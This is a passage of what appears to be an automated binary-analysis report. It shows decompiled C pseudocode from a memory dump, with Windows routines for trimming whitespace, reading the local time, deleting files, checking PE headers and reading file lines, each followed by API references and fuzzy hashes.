                                                      							_push(_t70);
                                                      							L4A7524E9();
                                                      							 *0x4a754188 = _t70;
                                                      							 *((intOrPtr*)(_t114 - 4)) = 0xfffffffe;
                                                      							_t93 =  *0x4a754188; // 0x0
                                                      							__eflags = _t93;
                                                      							if(_t93 == 0) {
                                                      								_t93 =  *0x4a754114; // 0x0
                                                      								_t105 =  *0x4a754118; // 0x0
                                                      								 *((short*)(_t93 + _t105 * 8 - 4)) =  *(_t114 - 0x24);
                                                      								 *_t113 =  *(_t114 - 0x24);
                                                      								_t113[1] =  *((intOrPtr*)(_t114 - 0x22));
                                                      								_t74 = 0x5c;
                                                      								_t113[2] = _t74;
                                                      								__eflags = _t88;
                                                      								if(__eflags == 0) {
                                                      									_t113[3] = 0;
                                                      								} else {
                                                      									_t39 =  &(_t113[3]); // 0x6
                                                      									E4A73185A(_t39,  *((intOrPtr*)(_t114 - 0x2c)), _t88);
                                                      								}
                                                      								goto L10;
                                                      							} else {
                                                      								__eflags = _t93 - 0x55;
                                                      								if(_t93 == 0x55) {
                                                      									L35:
                                                      									_t68 = ( *(_t114 - 0x24) & 0x000000ff) - 1;
                                                      									 *(_t114 - 0x24) = _t68;
                                                      									_t93 = 0;
                                                      									 *0x4a754188 = 0;
                                                      									continue;
                                                      								}
                                                      								__eflags = _t93 - 0x4b2;
                                                      								if(_t93 != 0x4b2) {
                                                      									_t68 =  *(_t114 - 0x24);
                                                      									continue;
                                                      								}
                                                      								goto L35;
                                                      							}
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      				} else {
                                                      					_t110 = E4A732ED1(_t113);
                                                      					while(_t110 > _t113 && iswspace( *_t110 & 0x0000ffff) != 0) {
                                                      						 *_t110 = 0;
                                                      						_t110 = _t110;
                                                      					}
                                                      					goto L4;
                                                      				}
                                                      			}


                                                      APIs
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • iswspace.MSVCRT ref: 4A73BF65
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID:
                                                      • API String ID: 2389812497-0
                                                      • Opcode ID: 1ca4e143a6b3318e85a00ad9a02373369093fdca911f4035a94c5a0bc5492329
                                                      • Instruction ID: 267c3bab5719ceb659c38c686d6d43d280d567eb9508c2d6655760516caa6916
                                                      • Opcode Fuzzy Hash: 1ca4e143a6b3318e85a00ad9a02373369093fdca911f4035a94c5a0bc5492329
                                                      • Instruction Fuzzy Hash: BA714AB1949A16EEEB70DFA0C8859AE7FBCEF59310F12401AE445DB941EB344D88C719
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E4A74C53B(void* __ecx, intOrPtr* _a4, signed int _a8) {
                                                      				signed int _v8;
                                                      				char _v34;
                                                      				short _v36;
                                                      				short _v38;
                                                      				char _v40;
                                                      				char _v72;
                                                      				char _v596;
                                                      				signed int _v600;
                                                      				struct _SYSTEMTIME _v616;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t31;
                                                      				short _t33;
                                                      				short _t34;
                                                      				short _t35;
                                                      				intOrPtr _t38;
                                                      				intOrPtr _t39;
                                                      				void* _t40;
                                                      				void* _t46;
                                                      				signed int _t48;
                                                      				signed short* _t49;
                                                      				void* _t62;
                                                      				intOrPtr* _t68;
                                                      				void* _t91;
                                                      				void* _t102;
                                                      				intOrPtr* _t103;
                                                      				signed int _t104;
                                                      				signed int _t107;
                                                      				void* _t108;
                                                      
                                                      				_t91 = __ecx;
                                                      				_t31 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t31 ^ _t107;
                                                      				_t104 = _a8;
                                                      				_t103 = _a4;
                                                      				if(_t104 != 0) {
                                                      					_t33 = 0x3a;
                                                      					_v40 = _t33;
                                                      					_t34 = 0x2e;
                                                      					_v38 = _t34;
                                                      					_t35 =  *0x4a754950; // 0x0
                                                      					_v36 = _t35;
                                                      					E4A73185A( &_v34, 0xd, 0x4a754930);
                                                      				} else {
                                                      					E4A73185A( &_v40, 0x10, "/-.");
                                                      					E4A7320A9(_t104,  &_v40, 0x10, 0x4a754940);
                                                      				}
                                                      				L3:
                                                      				while(1) {
                                                      					if(_t103 == 0 ||  *_t103 == 0) {
                                                      						_t38 =  *0x4a7541d0; // 0x0
                                                      						_t39 = _t38;
                                                      						if(_t39 == 0) {
                                                      							_t40 = 0x2342;
                                                      						} else {
                                                      							if(_t39 == 0) {
                                                      								_t40 = 0x4000271d;
                                                      							} else {
                                                      								_t40 = 0x4000271e;
                                                      							}
                                                      						}
                                                      						if(_t104 != 0) {
                                                      							_push(0);
                                                      							_push(0x2343);
                                                      							E4A7399E1(_t91);
                                                      						} else {
                                                      							E4A7399E1(_t91, _t40, 1, 0x4a754940);
                                                      							_t108 = _t108 + 0xc;
                                                      						}
                                                      						_t43 =  &_v596;
                                                      						__imp___get_osfhandle( &_v596, 0x104,  &_v600);
                                                      						if(E4A7367D3(_t43, 0) == 0) {
                                                      							goto L39;
                                                      						} else {
                                                      							_t48 = _v600;
                                                      							if(_t48 == 0) {
                                                      								goto L39;
                                                      							}
                                                      							_t97 = 0;
                                                      							 *((short*)(_t107 + _t48 * 2 - 0x250)) = 0;
                                                      							_t49 =  &_v596;
                                                      							if(_v596 == 0) {
                                                      								L25:
                                                      								if(E4A733B03(_t49, _t97, 0) == 0) {
                                                      									E4A7358F3(L"%s\r\n",  &_v596);
                                                      									_pop(_t97);
                                                      								}
                                                      								goto L27;
                                                      							} else {
                                                      								goto L20;
                                                      							}
                                                      							while(1) {
                                                      								L20:
                                                      								_t97 =  *_t49 & 0x0000ffff;
                                                      								if(_t97 == 0xa || _t97 == 0xd) {
                                                      									break;
                                                      								}
                                                      								_t49 =  &(_t49[1]);
                                                      								if( *_t49 == 0) {
                                                      									goto L25;
                                                      								}
                                                      							}
                                                      							_t97 = 0;
                                                      							 *_t49 = 0;
                                                      							goto L25;
                                                      						}
                                                      					} else {
                                                      						_t68 = _t103;
                                                      						_t102 = _t68 + 2;
                                                      						do {
                                                      							_t97 =  *_t68;
                                                      							_t68 = _t68 + 2;
                                                      						} while (_t97 != 0);
                                                      						if(_t68 - _t102 >> 1 >= 0x104) {
                                                      							asm("sbb esi, esi");
                                                      							_t104 = ( ~_t104 & 0x00000003) + 0x232f;
                                                      							_push(0);
                                                      							_push(_t104);
                                                      							E4A7399E1(_t97);
                                                      							L38:
                                                      							L39:
                                                      							_t46 = 1;
                                                      							L40:
                                                      							return E4A7313A9(_t46, 0, _v8 ^ _t107, _t102, _t103, _t104);
                                                      						}
                                                      						E4A73185A( &_v596, 0x105, _t103);
                                                      						L27:
                                                      						E4A73185A( &_v72, 0x10,  &_v40);
                                                      						E4A7320A9(_t104,  &_v72, 0x10, 0x4a7338d4);
                                                      						_t103 = E4A7322CA( &_v596,  &_v72, 2);
                                                      						if( *_t103 == 0) {
                                                      							L36:
                                                      							_t46 = 0;
                                                      							goto L40;
                                                      						}
                                                      						GetLocalTime( &_v616);
                                                      						_push( &_v40);
                                                      						_push(_t103);
                                                      						_push( &_v616);
                                                      						if(_t104 != 0) {
                                                      							_t62 = E4A74C391();
                                                      						} else {
                                                      							_t62 = E4A74C245();
                                                      						}
                                                      						if(_t62 == 0) {
                                                      							L34:
                                                      							asm("sbb eax, eax");
                                                      							_push(0);
                                                      							_push(( ~_t104 & 0x00000003) + 0x232f);
                                                      							E4A7399E1(_t97);
                                                      							_pop(_t91);
                                                      							_t103 = 0;
                                                      							continue;
                                                      						} else {
                                                      							if(E4A74C21F( &_v616) != 0) {
                                                      								goto L36;
                                                      							}
                                                      							_t103 = GetLastError;
                                                      							if(GetLastError() == 0x522) {
                                                      								_push(0);
                                                      								_push(GetLastError());
                                                      								E4A736D44(_t97);
                                                      								goto L38;
                                                      							}
                                                      							goto L34;
                                                      						}
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A74C63E
                                                        • Part of subcall function 4A7367D3: GetFileType.KERNEL32(4A754210), ref: 4A7367DB
                                                      • GetLocalTime.KERNEL32(?,?,?,00000002,?,00000010,4A7338D4,?,00000010,?,00000000,00000000), ref: 4A74C6F7
                                                      • GetLastError.KERNEL32 ref: 4A74C733
                                                      • GetLastError.KERNEL32(00000000), ref: 4A74C775
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast$FileLocalTimeType_get_osfhandle
                                                      • String ID: %s$/-.
                                                      • API String ID: 2612908278-531045382
                                                      • Opcode ID: 3d90c45873d935d7b37a4f071d9ea08a3cfa06ea0eb8dbdb733038f5124523e9
                                                      • Instruction ID: f1fc1f803ed095e90e3d095dc9894834748e5ea9741c8fc0520926d84c67e6b6
                                                      • Opcode Fuzzy Hash: 3d90c45873d935d7b37a4f071d9ea08a3cfa06ea0eb8dbdb733038f5124523e9
                                                      • Instruction Fuzzy Hash: 8251D67290C119AAEB30EBA0CC99AEE7F7CEB45301F124566E602EB441E774DE4CC765
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E4A73A6BE(void* __edx, long _a4, intOrPtr _a8, signed int* _a16) {
                                                      				signed int _v8;
                                                      				short _v532;
                                                      				short _v1056;
                                                      				char _v1057;
                                                      				signed int _v1064;
                                                      				intOrPtr _v1068;
                                                      				signed char* _v1072;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t61;
                                                      				signed int* _t63;
                                                      				signed int _t64;
                                                      				signed int _t65;
                                                      				void* _t80;
                                                      				signed int _t81;
                                                      				int _t85;
                                                      				int _t94;
                                                      				intOrPtr _t98;
                                                      				signed int _t100;
                                                      				void* _t102;
                                                      				signed char* _t103;
                                                      				char _t105;
                                                      				void* _t110;
                                                      				intOrPtr _t111;
                                                      				long _t112;
                                                      				signed int _t114;
                                                      
                                                      				_t110 = __edx;
                                                      				_t61 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t61 ^ _t114;
                                                      				_t63 = _a16;
                                                      				_t112 = _a4;
                                                      				_t111 = _a8;
                                                      				_v1072 = _t63;
                                                      				_t64 =  *_t63;
                                                      				_v1064 =  *(_t111 + 2) & 0x0000ffff;
                                                      				_t105 = 0;
                                                      				_v1057 = 0;
                                                      				if((_t64 & 0x00000800) != 0) {
                                                      					_v1057 = 1;
                                                      				}
                                                      				if((_t64 & 0x00002000) != 0) {
                                                      					_t105 = 1;
                                                      				}
                                                      				_t103 = 0x106;
                                                      				if(_v1057 != 0 ||  *((char*)(_t112 + 0x11)) != 0 || _t105 != 0) {
                                                      					L7:
                                                      					if(( *(_t111 + 4) & 0x00000010) != 0) {
                                                      						L17:
                                                      						_t65 = 0;
                                                      						goto L18;
                                                      					}
                                                      					_v1064 = _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2;
                                                      					if(E4A739F7B( &_v532, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2) != 0) {
                                                      						_push(_v1064);
                                                      						goto L22;
                                                      					}
                                                      					if(E4A739F7B( &_v1056, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30) != 0) {
                                                      						E4A73185A( &_v1056, _t103,  &_v532);
                                                      					}
                                                      					if(_v1057 != 0) {
                                                      						_t80 = E4A74FE1B(_t103, _t105, _t110, _t111,  &_v1056, 0x232c, 0x2328);
                                                      						__eflags = _t80 - 1;
                                                      						if(_t80 == 1) {
                                                      							goto L11;
                                                      						}
                                                      						__eflags =  *0x4a7541b4; // 0x0
                                                      						_t65 = 0 | __eflags != 0x00000000;
                                                      						goto L18;
                                                      					} else {
                                                      						L11:
                                                      						_t103 = _v1072;
                                                      						if(( *_t103 & 0x00001000) != 0) {
                                                      							_t81 =  *(_t111 + 4);
                                                      							__eflags = _t81 & 0x00000001;
                                                      							if((_t81 & 0x00000001) == 0) {
                                                      								goto L12;
                                                      							}
                                                      							_t94 = SetFileAttributesW( &_v532, _t81 & 0xfffffffe);
                                                      							__eflags = _t94;
                                                      							if(_t94 != 0) {
                                                      								goto L12;
                                                      							}
                                                      							_push(_t94);
                                                      							_push(GetLastError());
                                                      							E4A736D44(_t105);
                                                      							goto L23;
                                                      						}
                                                      						L12:
                                                      						if(DeleteFileW( &_v1056) == 0) {
                                                      							_t85 = DeleteFileW( &_v532);
                                                      							__eflags = _t85;
                                                      							if(_t85 != 0) {
                                                      								goto L13;
                                                      							}
                                                      							_t112 = GetLastError();
                                                      							L14:
                                                      							if(_t112 != 0) {
                                                      								__eflags = _t112 - 0x4d3;
                                                      								if(_t112 == 0x4d3) {
                                                      									goto L23;
                                                      								}
                                                      								E4A7358F3(L"%s\r\n",  &_v1056);
                                                      								_push(0);
                                                      								_push(_t112);
                                                      								E4A736D44(_t105);
                                                      								goto L17;
                                                      							}
                                                      							_t103[0x60] = _t103[0x60] + 1;
                                                      							if( *0x4a754081 != 0 && ( *_t103 & 0x00000010) != 0) {
                                                      								E4A7399E1(_t105, 0x400023a1, 1,  &_v1056);
                                                      							}
                                                      							goto L17;
                                                      						}
                                                      						L13:
                                                      						_t112 = 0;
                                                      						goto L14;
                                                      					}
                                                      				} else {
                                                      					_t98 = E4A74002A(_t105,  *((intOrPtr*)(_t112 + 8)),  *((intOrPtr*)(_t112 + 0xc)));
                                                      					_v1068 = _t98;
                                                      					if(_t98 != 0) {
                                                      						_t100 = E4A739F7B( &_v532, 0x106,  *((intOrPtr*)(_t112 + 4)), _t98);
                                                      						__eflags = _t100;
                                                      						if(_t100 == 0) {
                                                      							 *((char*)(_t112 + 0x11)) = 1;
                                                      							_t102 = E4A74FE1B(0x106, _t105, _t110, _t111,  &_v532, 0x234e, 0x2328);
                                                      							__eflags = _t102 - 1;
                                                      							if(_t102 == 1) {
                                                      								goto L7;
                                                      							}
                                                      							L23:
                                                      							_t65 = 1;
                                                      							L18:
                                                      							return E4A7313A9(_t65, _t103, _v8 ^ _t114, _t110, _t111, _t112);
                                                      						}
                                                      						_push(_v1068);
                                                      						L22:
                                                      						E4A736D44(_t105, 0x400023da, 2,  *((intOrPtr*)(_t112 + 4)));
                                                      						goto L23;
                                                      					}
                                                      					goto L7;
                                                      				}
                                                      			}

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,0000232C,00002328,?,00000106,00000010,?,?,00000106,00000010,?), ref: 4A73A7BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID: %s
                                                      • API String ID: 4033686569-3043279178
                                                      • Opcode ID: d0f682eaba1b25c817eee59d95bfdc4d4e503f610b64c8f09aa8fa302f5d46d6
                                                      • Instruction ID: 853b5d3a1c9f3a62b3d3f8508ef9384a081432f84a42c8f6bd2f5c5f49c1aa75
                                                      • Opcode Fuzzy Hash: d0f682eaba1b25c817eee59d95bfdc4d4e503f610b64c8f09aa8fa302f5d46d6
                                                      • Instruction Fuzzy Hash: A751E8B1D0961DAEEB71CB60CD85BEA7FBCAF05310F824495E904D6082E775DA8CCB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E4A74D685(void* __ebx, intOrPtr __edx, void* __esi, WCHAR* _a4) {
                                                      				signed int _v8;
                                                      				long _v12;
                                                      				char _v72;
                                                      				struct _SECURITY_ATTRIBUTES* _v76;
                                                      				void* _v80;
                                                      				char _v84;
                                                      				signed int _v88;
                                                      				char _v104;
                                                      				void* __edi;
                                                      				signed int _t26;
                                                      				WCHAR* _t28;
                                                      				struct _SECURITY_ATTRIBUTES* _t30;
                                                      				signed int _t34;
                                                      				signed int _t40;
                                                      				signed short* _t49;
                                                      				void* _t54;
                                                      				void* _t55;
                                                      				LONG* _t64;
                                                      				void* _t66;
                                                      				void* _t67;
                                                      				void* _t68;
                                                      				signed int _t70;
                                                      
                                                      				_t65 = __esi;
                                                      				_t63 = __edx;
                                                      				_t53 = __ebx;
                                                      				_t26 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t26 ^ _t70;
                                                      				_t28 = _a4;
                                                      				_t64 = 0;
                                                      				_v76 = 0;
                                                      				if(_t28 != 0) {
                                                      					_push(__ebx);
                                                      					_t54 = CreateFileW(_t28, 0x80000000, 1, 0, 3, 0x80, 0);
                                                      					_v80 = _t54;
                                                      					if(_t54 == 0xffffffff) {
                                                      						L20:
                                                      						_t30 = _v76;
                                                      						_pop(_t53);
                                                      						goto L21;
                                                      					} else {
                                                      						_push(__esi);
                                                      						_push( &_v72);
                                                      						_push(_t54);
                                                      						_t66 = 0x40;
                                                      						if(E4A74D3DB(_t66) == 0) {
                                                      							_t34 = 0;
                                                      						} else {
                                                      							_t34 = 0 | 0x00005a4d == _v72;
                                                      						}
                                                      						if(_t34 != _t64 && (0 | SetFilePointer(_t54, _v12, _t64, _t64) != 0xffffffff) != _t64) {
                                                      							_push( &_v84);
                                                      							_push(_t54);
                                                      							_t67 = 4;
                                                      							if(E4A74D3DB(_t67) == 0) {
                                                      								_t40 = 0;
                                                      							} else {
                                                      								_t40 = 0 | _v84 == 0x00004550;
                                                      							}
                                                      							if(_t40 != _t64) {
                                                      								_push( &_v104);
                                                      								_push(_t54);
                                                      								_t68 = 0x14;
                                                      								if(E4A74D3DB(_t68) != 0 && _v88 > _t64) {
                                                      									_t64 = GetProcessHeap;
                                                      									_t55 = HeapAlloc(GetProcessHeap(), 8, _v88 & 0x0000ffff);
                                                      									if(_t55 != 0) {
                                                      										if(E4A74D3DB(_v88 & 0x0000ffff, _v80, _t55) != 0) {
                                                      											_t63 = _v104;
                                                      											_t49 = E4A74D3B9(_t55, _v104);
                                                      											if(_t49 != 0) {
                                                      												_v76 =  *_t49 & 0x0000ffff;
                                                      											}
                                                      										}
                                                      										HeapFree(GetProcessHeap(), 0, _t55);
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						CloseHandle(_v80);
                                                      						_pop(_t65);
                                                      						goto L20;
                                                      					}
                                                      				} else {
                                                      					_t30 = 0;
                                                      					L21:
                                                      					return E4A7313A9(_t30, _t53, _v8 ^ _t70, _t63, _t64, _t65);
                                                      				}
                                                      			}

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 4A74D6BD
                                                      • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,?,?), ref: 4A74D705
                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?), ref: 4A74D766
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A74D769
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 4A74D79D
                                                      • HeapFree.KERNEL32(00000000), ref: 4A74D7A0
                                                      • CloseHandle.KERNEL32(?), ref: 4A74D7A9
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                      • String ID:
                                                      • API String ID: 3093239467-0
                                                      • Opcode ID: 5032b11af7262d3213745f73b1b5ec5d68bae37bf5cc8e852e17ce0189c2811f
                                                      • Instruction ID: 42acee38e4b84c518e2c4505c382bd015665c8abfaa3d04046fc78b4146f52a9
                                                      • Opcode Fuzzy Hash: 5032b11af7262d3213745f73b1b5ec5d68bae37bf5cc8e852e17ce0189c2811f
                                                      • Instruction Fuzzy Hash: 4D31C2B2604205BADB719BB5CD84EBE7FBCEB85790F118125F541DA182E670CD49C724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E4A734D9A(void* _a4, short* _a8, long _a12, DWORD* _a16) {
                                                      				long _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				int _t37;
                                                      				char* _t40;
                                                      				signed int _t41;
                                                      				int _t44;
                                                      				signed int _t45;
                                                      				int _t48;
                                                      				signed char _t50;
                                                      				char* _t57;
                                                      				int _t58;
                                                      				int _t63;
                                                      
                                                      				_t57 = 0x4a756640;
                                                      				_v16 = SetFilePointer(_a4, 0, 0, 1);
                                                      				if(_a12 >= 0x1fff) {
                                                      					_a12 = 0x1fff;
                                                      				}
                                                      				 *0x4a7540f8 = 1;
                                                      				_t37 = ReadFile(_a4, 0x4a756640, _a12, _a16, 0);
                                                      				 *0x4a7540f8 = 0;
                                                      				__eflags = _t37;
                                                      				if(_t37 == 0) {
                                                      					L15:
                                                      					return 0;
                                                      				} else {
                                                      					_t40 =  *_a16;
                                                      					__eflags = _t40;
                                                      					if(__eflags == 0) {
                                                      						goto L15;
                                                      					}
                                                      					_v12 = _t40;
                                                      					_v8 = _t40;
                                                      					if(__eflags <= 0) {
                                                      						L13:
                                                      						_t58 =  *0x4a7541b8; // 0x0
                                                      						_t41 = E4A734B8D(_t58);
                                                      						asm("sbb eax, eax");
                                                      						_t44 = MultiByteToWideChar(_t58,  ~( ~_t41), 0x4a756640, _v12, _a8, _a12);
                                                      						 *_a16 = _t44;
                                                      						return _t44;
                                                      					} else {
                                                      						goto L7;
                                                      					}
                                                      					do {
                                                      						L7:
                                                      						__eflags = _v8 - 3;
                                                      						if(_v8 < 3) {
                                                      							L10:
                                                      							_t45 =  *_t57 & 0x000000ff;
                                                      							__eflags =  *(_t45 + 0x4a754e40);
                                                      							if( *(_t45 + 0x4a754e40) != 0) {
                                                      								__eflags = _v8 - 1;
                                                      								if(_v8 == 1) {
                                                      									 *0x4a7540f8 = 1;
                                                      									_t48 = ReadFile(_a4,  &(_t57[1]), 1,  &_v8, 0);
                                                      									 *0x4a7540f8 = 1;
                                                      									__eflags = _t48;
                                                      									if(_t48 == 0) {
                                                      										L23:
                                                      										 *_a16 = 0;
                                                      										goto L15;
                                                      									}
                                                      									__eflags = _v8;
                                                      									if(_v8 == 0) {
                                                      										goto L23;
                                                      									}
                                                      									_v12 = _v12 + 1;
                                                      									goto L13;
                                                      								}
                                                      								_v8 = _v8 - 2;
                                                      								_t57 =  &(_t57[2]);
                                                      								goto L12;
                                                      							}
                                                      							_v8 = _v8 - 1;
                                                      							_t57 =  &(_t57[1]);
                                                      							__eflags = _t57;
                                                      							goto L12;
                                                      						}
                                                      						_t50 =  *_t57;
                                                      						__eflags = _t50 - 0xa;
                                                      						if(_t50 == 0xa) {
                                                      							__eflags = _t57[1] - 0xd;
                                                      							if(_t57[1] != 0xd) {
                                                      								goto L9;
                                                      							}
                                                      							L2:
                                                      							_t57[2] = 0;
                                                      							_t63 = _t57 - 0x4a756640 + 2;
                                                      							_v12 = _t63;
                                                      							SetFilePointer(_a4, _t63 + _v16, 0, 0);
                                                      							goto L13;
                                                      						}
                                                      						L9:
                                                      						__eflags = _t50 - 0xd;
                                                      						if(_t50 == 0xd) {
                                                      							goto L1;
                                                      						}
                                                      						goto L10;
                                                      						L12:
                                                      						__eflags = _v8;
                                                      					} while (_v8 > 0);
                                                      					goto L13;
                                                      				}
                                                      				L1:
                                                      				if(_t57[1] != 0xa) {
                                                      					goto L10;
                                                      				}
                                                      				goto L2;
                                                      			}

















                                                      APIs
                                                      • SetFilePointer.KERNEL32(4A754210,00000000,00000000,00000001,4A76C642,4A75C640,00000000), ref: 4A734DB5
                                                      • ReadFile.KERNEL32(4A754210,4A756640,00000000,?,00000000), ref: 4A734DDD
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A756640,4A754210,00000006,?), ref: 4A734E54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File$ByteCharMultiPointerReadWide
                                                      • String ID: @fuJ
                                                      • API String ID: 2002143677-843781518
                                                      • Opcode ID: 3d13968baa047eb30f3193dd5683d7c3386a9edcf578dd99804259050e32ef22
                                                      • Instruction ID: f4a79f6ea90e9c2e4cb8da0972a99a0f08bf49741e9ef6a5a3b7c85fd09cc881
                                                      • Opcode Fuzzy Hash: 3d13968baa047eb30f3193dd5683d7c3386a9edcf578dd99804259050e32ef22
                                                      • Instruction Fuzzy Hash: D341DFB6888259FFDB71CFA0C9849AE3FB9EF06396F124069E855D3101D3308E49DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E4A74F354(long _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                      				char _v8;
                                                      				long _v12;
                                                      				char _v16;
                                                      				long _t29;
                                                      				void* _t31;
                                                      				signed int _t37;
                                                      				intOrPtr _t44;
                                                      				signed int _t45;
                                                      				long _t47;
                                                      				void* _t49;
                                                      				void* _t50;
                                                      				char _t52;
                                                      				intOrPtr* _t61;
                                                      				intOrPtr _t62;
                                                      
                                                      				_t47 = 0;
                                                      				_v12 = 0;
                                                      				_v16 = 0;
                                                      				_t29 = E4A74FDFD(_a4, 2, 0);
                                                      				_a4 = _t29;
                                                      				if(_t29 == 0xffffffff) {
                                                      					E4A74056B(0x6e);
                                                      					L2:
                                                      					L4A74F2D7(_t49, _t47, 1);
                                                      				}
                                                      				_t61 = __imp___get_osfhandle;
                                                      				_push(_t62);
                                                      				_t62 = _a8;
                                                      				while(1) {
                                                      					_t31 =  *_t61(_a4, _a12, _a16,  &_v8, _t47);
                                                      					_pop(_t50);
                                                      					if(ReadFile(_t31, ??, ??, ??, ??) == 0) {
                                                      						break;
                                                      					}
                                                      					_t37 =  *(_t62 + 0x1c);
                                                      					_t52 = _v8;
                                                      					_a8 = _t52;
                                                      					if((_t37 & 0x0000c000) == 0) {
                                                      						if(_t52 <= 2) {
                                                      							L10:
                                                      							_t45 = _t37 | 0x00008000;
                                                      						} else {
                                                      							if( *_a12 != 0xfeff) {
                                                      								_t47 = 0;
                                                      								goto L10;
                                                      							} else {
                                                      								_t45 = _t37 | 0x00004000;
                                                      								_t47 = 0;
                                                      							}
                                                      						}
                                                      						 *(_t62 + 0x1c) = _t45;
                                                      					}
                                                      					if(_t52 != _t47) {
                                                      						asm("sbb ecx, ecx");
                                                      						_t44 = E4A74E4DC( ~(( *(_t62 + 0x1c) & 0x00008002) - 0x8002) + 1, _a12,  &_v8,  &_v16);
                                                      						_t52 = _v8;
                                                      						_v12 = _t44;
                                                      					}
                                                      					if(_t52 == _a16) {
                                                      						continue;
                                                      					}
                                                      					if(_v12 == _t47) {
                                                      						SetFilePointer( *_t61(1), _a4, _t52 - _a8, _t47);
                                                      					}
                                                      					return _a4;
                                                      				}
                                                      				 *0x4a754128 = GetLastError();
                                                      				E4A733AB3(_a4);
                                                      				_push(_t47);
                                                      				_push( *0x4a754128);
                                                      				E4A736D44(_t50);
                                                      				_pop(_t49);
                                                      				goto L2;
                                                      			}


















                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A74F3A0
                                                      • ReadFile.KERNEL32(00000000), ref: 4A74F3A4
                                                      • _get_osfhandle.MSVCRT ref: 4A74F42C
                                                      • SetFilePointer.KERNEL32(00000000), ref: 4A74F430
                                                        • Part of subcall function 4A74F354: longjmp.MSVCRT(4A754AC0,00000001,?,?,4A7487D6,00000001,?,?,?), ref: 4A74F348
                                                        • Part of subcall function 4A74F354: GetLastError.KERNEL32 ref: 4A74F43F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File_get_osfhandle$ErrorLastPointerReadlongjmp
                                                      • String ID: %9d
                                                      • API String ID: 769294559-2241623522
                                                      • Opcode ID: 3a9ea67b33707501ac9c79a12516909b5ac100075c9a31106cd9c876bfdc1778
                                                      • Instruction ID: f919d7c3f8881919ad74ae1174fe85f9bfb37c0a40c7632f7c061beb74d212e3
                                                      • Opcode Fuzzy Hash: 3a9ea67b33707501ac9c79a12516909b5ac100075c9a31106cd9c876bfdc1778
                                                      • Instruction Fuzzy Hash: A13181B6A04209BFDF649FA4C885D9E3F7DEF04710F11852AFA02D6580DA70A948CB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E4A735291(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				long _t117;
                                                      				intOrPtr* _t119;
                                                      				signed int _t122;
                                                      				void* _t123;
                                                      				short* _t129;
                                                      				wchar_t* _t130;
                                                      				wchar_t* _t132;
                                                      				long _t141;
                                                      				intOrPtr* _t142;
                                                      				signed int _t146;
                                                      				intOrPtr* _t147;
                                                      				intOrPtr* _t151;
                                                      				void* _t153;
                                                      				wchar_t* _t157;
                                                      				wchar_t* _t169;
                                                      				wchar_t* _t171;
                                                      				wchar_t* _t175;
                                                      				wchar_t* _t177;
                                                      				void _t181;
                                                      				wchar_t* _t196;
                                                      				signed int _t198;
